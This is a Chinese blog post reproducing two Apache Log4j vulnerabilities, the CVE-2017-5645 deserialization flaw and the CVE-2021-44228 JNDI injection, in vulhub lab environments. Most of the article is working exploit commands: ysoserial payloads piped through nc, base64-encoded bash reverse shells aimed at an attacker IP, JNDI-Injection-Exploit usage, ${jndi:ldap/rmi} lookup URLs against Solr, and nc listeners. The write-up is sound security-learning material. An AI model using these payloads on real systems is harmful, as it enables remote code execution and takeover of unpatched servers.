Log4j反序列化命令执行漏洞(CVE-2017-5645)&Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

已于 2023-08-20 12:26:51 修改
阅读量693 收藏
点赞数
分类专栏: 中间件&框架漏洞复现 文章标签: log4j apache
于 2023-08-20 12:26:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/132323346
版权

一.Log4j反序列化命令执行漏洞(CVE-2017-5645)

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

环境:vulhub
工具下载地址:
ysoserial

利用工具生成payload:

#创建文件
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/test" | nc 192.168.85.128 4712

#反弹shell
#把 bash -i >& /dev/tcp/192.168.85.129/4466 0>&1进行base64编码
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44NS4xMjkvNDQ2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.85.128 4712

1.创建文件 进入容器内部,查看文件创建成功

docker ps
docker exec -it 19bdcb0184e1 /bin/bash
cd /tmp 
ls

2.查看反弹的shell
有点问题没反弹成功,应该是这样做的

nc -lvvp 4466

​二.Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码

环境:vulhub
工具下载地址:
JNDI-Injection-Exploit
1.利用dnslog平台检测是否有漏洞

后面换成dnslong平台的域名
http://192.168.85.128:8983/solr/admin/cores?action=${jndi:ldap://yahs0y.dnslog.cn}

在这里插入图片描述
2.利用工具反弹shell
(1)使用工具生成payload

1.把bash -i >& /dev/tcp/192.168.85.129/4444 0>&1进行base64编码 填入echo后,-A参数后填入攻击机的ip
2.利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.85.129

(2)选用一个作为url action后的payload,访问此url
这里选用第一个,下面的url访问

http://192.168.85.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.85.129:1099/itx5mr}

(3)攻击机开启监听

nc -lvvp 4444

在这里插入图片描述

参考文章:
CVE-2021-44228

mushangqiujin
关注
专栏目录
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6100
log4j 漏洞CVE-2021-44228 漏洞复现
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645
san3144393495的博客
04-23 2046
ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。当Log4j处理来自外部的序列化数据时,如果数据经过恶意修改,可能会触发不安全的反序列化操作,进而导致攻击者执行任意代码。如果数据是恶意pyload,就会触发不安全的反序列化操作,导致名命令执行漏洞,通过java的流泪有关。{bash,-i}:这个命令执行解码后的 Bash 命令,即与指定的 IP 地址和端口建立一个交互式的 Shell 连接。
Apache Log4j2 lookup JNDI 注入漏洞CVE-2021-44228
qq_41696518的博客
06-13 950
环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
weixin_44047654的博客
12-13 1842
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
Apache log4j2(CVE-2021-44228)漏洞(复现详细过程)
m0_52701599的博客
03-31 862
Apache log4j2(CVE-2021-44228)漏洞(复现详细过程)
[CVE-2021-45105] Apache Log4j2 漏洞复现与原理详细分析
Specif1c的博客
08-10 1826
2021年12月9日,各大公司都被一个核弹级漏洞惊醒了,该漏洞一旦被攻击者利用就会造成及其严重的影响。该漏洞甚至被认为可能是“计算机历史上最大的漏洞”。
Log4j2漏洞复现(CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
weblogicT3反序列化CVE-2017-3248&CVE-2018-2628&CVE-2018-3245
weixin_45682070的博客
03-13 5845
前言 上上篇文章我们分析了CVE-2015-4852、CVE-2016-0638、CVE-2016-3510的漏洞,因果是从resolveClass方法中出现的,resolveClass方法直接继承了父类的方法,然后没有任何过滤的造成了序列化漏洞,后面两个cve都是前者的绕过。今天分析一下CVE-2017-3248 & CVE-2018-2628,上上文中我们知道readClassDesc类描述方法可分为没有代理的类和代理类,CVE-2017-3248漏洞的成因就是代理类resolveProxyCl
Log4j漏洞调研,源码浅解析
weixin_44029684的博客
12-17 1577
最近log4j的安全漏洞突然冒了出来,用了许久slf4j的我吓得赶紧翻遍了依赖,发现自己用的依赖并没有依赖上log4j-core,长吁一口气。吃了个午饭后转念一想我又没工作,也没啥线上项目在跑,何故担心这些问题?wc,那倒腾半天不就白整了,不行,反正这漏洞在java圈也挺大的,不如顺便研究一波,在未来应聘时也有聊的地方。 全文几乎都是站在巨人的肩膀上完成的,新人技术不佳,还望轻喷。
Apache log4j远程代码执行漏洞复现
qq_46162550的博客
05-11 1821
Apache log4j远程代码执行漏洞复现(1) 漏洞原理:(2) 漏洞复现环境:(3) 漏洞复现过程: (1) 漏洞原理: Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏
SpirngBoot核心思想之一IOC
九离的博客
09-29 1282
IOC是 Spring Boot 及整个 Spring 框架的核心思想之一,它通过依赖注入机制解决了传统开发中对象管理的高耦合问题,增强了代码的模块化、可扩展性和可测试性。通过将控制权从程序转移到框架,开发者可以专注于业务逻辑,减少手动管理对象和依赖的繁琐工作。通过构造函数、Setter 或字段注入,Spring Boot 提供了多种灵活的 IOC 实现方式,适应不同场景下的开发需求。掌握 IOC 这一理念,将有助于我们构建更优雅、可维护的应用。
什么是 Apache Ingress
汪子熙的专家技术分享
09-29 1338
通过使用 Kubernetes 和 Ingress 控制器,Netflix 可以实现对外部流量的精细化控制,将用户请求可靠地路由到相应的微服务,从而保证了高效和稳定的服务体验。在这些情况下,可以采用 Let’s Encrypt 这样的免费的证书颁发机构,通过自动化的方式获取和更新 SSL 证书,从而简化运维过程。而 Apache Ingress Controller 是一种具体的实现,它实际上是一个负载均衡器,读取 Ingress 资源中的配置,并按照这些规则进行流量分发。路由到用户认证服务,将。
Linux复习--Linux服务管理类(SSH服务、DHCP+FTP、DNS服务、Apache服务、Nginx服务、HTTP状态码)
小李学不完的博客
10-03 1616
SSH服务:SSH的登录验证方式-口令登录、密钥登录、登录设置。DHCP+FTP:租约四部曲、续租、租用失败。DNS服务、Apache配置:rewrite地址重写。Nginx服务、HTTP状态码分类。
(一)Web 网站服务之 Apache
最新发布
卓琢
10-03 1375
在当今数字化时代,Web 网站服务至关重要。本文将详细介绍 Apache 的作用、特点、安装过程以及配置 Apache 网站服务器的方法。
基于Apache和Tomcat的负载均衡实验报告
holer的博客
09-30 1051
负载均衡即把负载压力根据某种算法合理分配到集群中的每一台计算机上,以减轻主服务器的压力,降低对主服务器的硬件和软件要求。
Java中的HTTP请求:使用Apache HttpClient
2401_87195067的博客
09-30 737
Apache HttpClient是一个功能丰富的库,它使得在Java中发送HTTP请求变得简单而直观。无论是简单的数据获取还是复杂的API交互,Apache HttpClient都能满足你的需求。Apache HttpClient是Apache软件基金会的一个项目,它提供了一个支持HTTP协议的客户端编程工具包。它支持HTTP连接的持久化(连接复用)、HTTP状态码、异常处理等高级功能。在使用Apache HttpClient之前,你需要将其添加到你的项目依赖中。处理HTTP响应同样简单。
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值